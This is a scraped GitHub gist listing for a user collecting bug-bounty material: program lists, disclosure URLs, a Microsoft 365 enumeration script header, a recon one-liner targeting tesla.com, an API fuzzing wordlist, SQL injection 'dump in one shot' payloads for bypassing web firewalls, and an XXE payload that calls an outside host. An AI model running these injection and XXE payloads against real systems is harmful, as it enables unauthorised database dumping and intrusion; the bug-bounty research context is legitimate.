SAGAR DHAKAL sagardhakal-photon

“When exposing a crime is treated as committing a crime, you are being ruled by criminals!” - Edward Snowden

8 followers · 16 following

ioe
white house
example.com
@PHOTON_sagardhk

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

sagardhakal-photon / target BB

Created March 28, 2023 16:48 — forked from marz-hunter/target BB

Large target BugBounty

	[
	{
	"program_name": "(ISC)²",
	"policy_url": "https://bugcrowd.com/isc2",
	"submission_url": "https://bugcrowd.com/isc2/report",
	"launch_date": "",
	"bug_bounty": false,
	"swag": false,
	"hall_of_fame": true,
	"safe_harbor": "partial"

sagardhakal-photon / bbprograms.txt

Created March 28, 2023 16:47 — forked from prinsharma1999/bbprograms.txt

Saved from https://gist.github.com/onurcyukruk/5e70bd1f16d0428a34aed08d4cff0773

	google dork -> site:.co.uk inurl:"responsible disclosure"
	https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
	http://www.123contactform.com/security-acknowledgements.htm
	https://18f.gsa.gov/vulnerability-disclosure-policy/
	https://support.1password.com/security-assessments/
	https://www.23andme.com/security-report/
	https://www.abnamro.com/en/footer/responsible-disclosure.html
	https://www.accenture.com/us-en/company-accenture-responsible-disclosure
	https://www.accredible.com/white_hat/
	https://www.acquia.com/how-report-security-issue

sagardhakal-photon / all-dutch-government.md

Created March 7, 2023 06:56 — forked from attacker-codeninja/all-dutch-government.md

Dutch government bug bounty scope. Updates will pushed every month

Dutch Government Bug Bounty Scope

The National Cyber Security Centre (NCSC) contributes to jointly enhancing the resilience of the Dutch society in the digital domain and, in doing so, realizes a safe, open and stable information society by providing insight and offering a perspective for action. Therefore it is essential that the ICT systems of the NCSC are safe. The NCSC strives towards providing a high level of security for its system. However, it can occur that one of these systems has a vulnerability.

For more information about reporting the bugs go to https://english.ncsc.nl/contact/reporting-a-vulnerability-cvd

Source https://gist.github.com/random-robbie/f985ad14fede2c04ac82dd89653f52ad
https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid

sagardhakal-photon / 365doms.py

Created March 7, 2023 06:54 — forked from nullenc0de/365doms.py

modified from https://github.com/expl0itabl3/check_mdi

	#!/usr/bin/env python3

	"""
	Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance.
	Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance.
	Usage: ./check_mdi.py -d <domain>
	"""

	import argparse
	import dns.resolver

sagardhakal-photon / Shodan_scan

Created March 7, 2023 06:54 — forked from nullenc0de/Shodan_scan

	curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json \|jq -r '.vulnerabilities[].cveID' > cves.txt

	subfinder -d tesla.com -silent \|dnsx -silent -a -resp-only \|sort -u \|xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% \|grep "CIDR" \|cut -d : -f2 \|tr , "\n"\| awk '{$1=$1};1' \|sort -u \|egrep -v "/8\|/9\|/10\|/11\|/12\|/13\|/14\|/15\|/16" \|while read ip ;do whois -h whois.cymru.com " -v $ip" ;done \|grep -v "BGP Prefix" \|cut -d '\|' -f3 \|awk '{$1=$1};1' \|sort -u \|cidr2ip \|sort -u \|nrich - \|grep -B4 -f cves.txt \| tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt

sagardhakal-photon / List of API endpoints & objects

Created January 5, 2023 17:08 — forked from yassineaboukir/List of API endpoints & objects

A list of 3203 common API endpoints and objects designed for fuzzing.

	0
	00
	01
	02
	03
	1
	1.0
	10
	100
	1000

sagardhakal-photon / List of API endpoints & objects

Created January 5, 2023 17:08 — forked from yassineaboukir/List of API endpoints & objects

A list of 3203 common API endpoints and objects designed for fuzzing.

	0
	00
	01
	02
	03
	1
	1.0
	10
	100
	1000

sagardhakal-photon / dios-bypass-waf.txt

Created October 17, 2022 17:04 — forked from zetc0de/dios-bypass-waf.txt

DIOS (Dump In One Shoot) Collection bypass WAF

	DIOS (Dump In One Shot) Collection

	=======================================

	concat_ws('<br>','zet',database(),version(),user(),@@hostname,(select(group_concat('<br>',table_name,':',column_name))from(information_schema.columns)where(table_Schema=database())))

	(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.schemata)%20where%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,schema_name))))x)

	(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(0)%20from%20(information_schema.tables)%20where%20(table_schema=database())%20and%20(0x00)%20in%20(@x:=concat(@x,0x3c62723e,table_name))))x)

sagardhakal-photon / XXE_payloads

Created August 23, 2022 15:45 — forked from mgeeky/XXE_payloads

XXE Payloads

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>